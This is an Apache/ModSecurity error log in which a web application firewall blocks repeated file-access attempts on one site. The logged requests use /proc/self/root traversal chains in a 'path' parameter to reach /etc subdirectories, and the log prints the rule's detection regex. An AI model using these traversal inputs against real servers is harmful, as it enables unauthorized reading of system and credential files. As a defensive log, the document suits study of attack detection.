https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:47.434416 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:55646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH6-yqAr6etmhZHNofeAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:48.863057 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:55654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH7Pu8EFLIOrSqIptWqgAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:50.343749 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:55656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH7vu8EFLIOrSqIptWrgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:52.060196 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:55666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH8OoXxyEfFpUF8f_NKAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:54.054705 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.241.31:55670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH8RkFeYa1D6dYQnCnUwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:01.639941 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:55676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH-QbLMZ6AikZjR9UYPgAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:03.133521 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44986] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:22:04.122657 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:49330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH_OoXxyEfFpUF8f_NKQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:08.058486 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:49336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIANa6ubjKNq_cu4b2UAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:15.302359 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:37836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIB-yqAr6etmhZHNoffwAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:27.153480 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:58484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIE9a6ubjKNq_cu4b2WgAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:31.129814 2026] [proxy_fcgi:error] [pid 19093:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45674] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:22:50.344500 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:50602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIKgkwaGbbGflqUZBs0wAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:53.155548 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:42960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuILQkwaGbbGflqUZBs1QAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:56.970382 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:42966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIMPu8EFLIOrSqIptW1QAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:22:59.129788 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46296] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:23:04.466102 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.241.31:50224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIOP-YZRR_7pZ7nDJJKAAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:08.487688 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:34760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIO9a6ubjKNq_cu4b2dQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:10.610815 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:34776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIPuoXxyEfFpUF8f_NUwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:17.367677 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:34782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIRQkwaGbbGflqUZBs4AAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:19.794956 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:47904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIRwkwaGbbGflqUZBs4gAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:23.321033 2026] [:error] [pid 19093:tid 140411649607424] [client 74.7.241.31:47912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIS1_V7PWP6ixUYl53HAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:24.999093 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:47914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuITP-YZRR_7pZ7nDJJLQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:27.980771 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:47930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIT_u8EFLIOrSqIptW5AAAAlA"], referer: 